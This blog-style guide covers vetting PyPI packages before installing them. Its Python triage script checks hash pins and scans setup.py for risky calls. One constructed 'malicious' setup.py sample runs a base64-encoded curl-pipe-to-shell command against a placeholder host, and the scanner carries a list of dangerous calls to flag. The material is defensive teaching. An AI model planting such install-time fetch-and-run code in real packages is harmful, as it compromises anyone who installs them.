Security when installing Python packages
What to keep in mind when installing packages with pip
You should always think about security, especially when you write code, and twice as much when you use other people's code. Reusing it saves a lot of time and effort, but it can also lead to problems if you don't apply at least common sense.
When programming, you save commonly used classes, objects, and functions in modules, which is the official name for files with the extension .py. Conventionally, a module is distinguished from an ordinary Python program by its purpose: the program is designed to be run, while the module is designed to hold frequently used constructs that other programs import.
A package in Python is a directory containing modules, possibly other packages, and special files such as __init__.py. Packages form a namespace, which lets different modules, as a rule united by a common theme, be used together under one name.
The best known repository for such packages is PyPI, the Python Package Index. You can find and install packages on almost any topic there; in 2022 it contained over 370,000 different packages.
I was wondering what security measures other developers are taking to make sure they aren't downloading anything malicious from PyPI. After all, anyone can register an account and upload a package there, and PyPI does not review the code before it is published.
Some helpful tips on this topic:
- If you can understand it, look at the source code of a package before you install it. Keep in mind that pip runs the package's setup.py when it installs a source distribution, so code placed there executes at install time, not only when you import the package.
- Only install software from reputable developers. On the package page, at least look at the linked repository's GitHub stats: the number of stars and forks. The more there are, the more people use the package and the less likely it is to carry malicious code. Also check that the package name is exactly the one you want; look-alike names are a common way to slip a malicious package past a hurried pip install.
- Read the Python Security documentation about packages and PyPI.
- Pay attention to the Safety package. It checks your installed packages against a database of known vulnerabilities. pip-audit, maintained by the PyPA, does the same job.
- Use the Insecure Python Packages list to identify vulnerabilities in installed packages.
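The first tip (look before you install) and the pre-install check behind the vulnerability scanners above can be rehearsed offline. The following Python is an added example, not code from the original post, from Safety or from pip: it verifies an sdist tarball against a sha256 pin of the kind pip's --require-hashes mode enforces in a requirements file, then parses setup.py with the ast module and flags calls that execute commands, decode blobs or open network connections, because pip executes that file at install time. The tarball builder, the SUSPICIOUS_CALLS list and both setup.py samples are constructed for the example; neither sample is a real package.

```python
"""Pre-install triage of a Python source distribution (sdist).

Two checks to run before `pip install`:
  1. the artifact's SHA-256 matches the hash pinned in requirements.txt
     (this is what `pip install --require-hashes` enforces), and
  2. setup.py, which pip executes when building an sdist, contains no
     install-time code that runs commands, decodes blobs or reaches the network.
Everything here is constructed inline so it runs offline.
"""
import ast
import hashlib
import io
import tarfile

# Calls whose presence in setup.py warrants a manual look before installing.
# Constructed list for this example; extend it for your own triage.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile",
    "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "base64.b64decode", "urllib.request.urlopen", "requests.get", "socket.socket",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain such as subprocess.run, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str) -> list:
    """Return a sorted list of (line, call) for suspicious calls found in setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):  # walk visits nested calls too
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


def pin_for(artifact: bytes) -> str:
    """Produce the `sha256:<hex>` pin you would write after --hash= in requirements.txt."""
    return "sha256:" + hashlib.sha256(artifact).hexdigest()


def sha256_matches(artifact: bytes, pinned: str) -> bool:
    """Compare the artifact digest with a `sha256:<hex>` pin; other algorithms are rejected."""
    algo, _, digest = pinned.partition(":")
    if algo != "sha256":
        raise ValueError("only sha256 pins are handled here")
    return hashlib.sha256(artifact).hexdigest() == digest.lower()


def triage_sdist(artifact: bytes, pinned: str) -> dict:
    """Run both checks on a .tar.gz sdist held in memory."""
    result = {"hash_ok": sha256_matches(artifact, pinned), "findings": []}
    with tarfile.open(fileobj=io.BytesIO(artifact), mode="r:gz") as tar:
        for member in tar.getmembers():
            # setup.py sits at <name>-<version>/setup.py inside an sdist
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                src = tar.extractfile(member).read().decode("utf-8")
                result["findings"].extend(scan_setup_py(src))
    return result


def build_sdist(setup_py: str, name: str = "demo-1.0") -> bytes:
    """Construct a minimal .tar.gz sdist in memory (sample input, not a real package)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode("utf-8")
        info = tarfile.TarInfo(f"{name}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: a benign setup.py, and one that runs a decoded
# shell command at install time (the blob decodes to a curl-pipe-sh line
# pointing at the reserved example.invalid host).
BENIGN = "from setuptools import setup\nsetup(name='demo', version='1.0')\n"
MALICIOUS = (
    "import base64, subprocess\n"
    "from setuptools import setup\n"
    "subprocess.run(base64.b64decode('Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkIHwgc2g='), shell=True)\n"
    "setup(name='demo', version='1.0')\n"
)

if __name__ == "__main__":
    art = build_sdist(MALICIOUS)
    print(triage_sdist(art, pin_for(art)))
    # {'hash_ok': True, 'findings': [(3, 'base64.b64decode'), (3, 'subprocess.run')]}
```

For a real package, fetch the artifact without installing it (pip download --no-deps --no-binary :all: <name>) and feed the file to triage_sdist with the pin from your requirements file. A clean scan is not proof of safety, since code can be hidden in the package body or in a build backend rather than setup.py, but a hit is a reason to stop and read.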
Among the features PyPI plans to add are verifiable cryptographic artifact signing and automatic detection of malicious packages.
Let your code and your modules be always safe! :)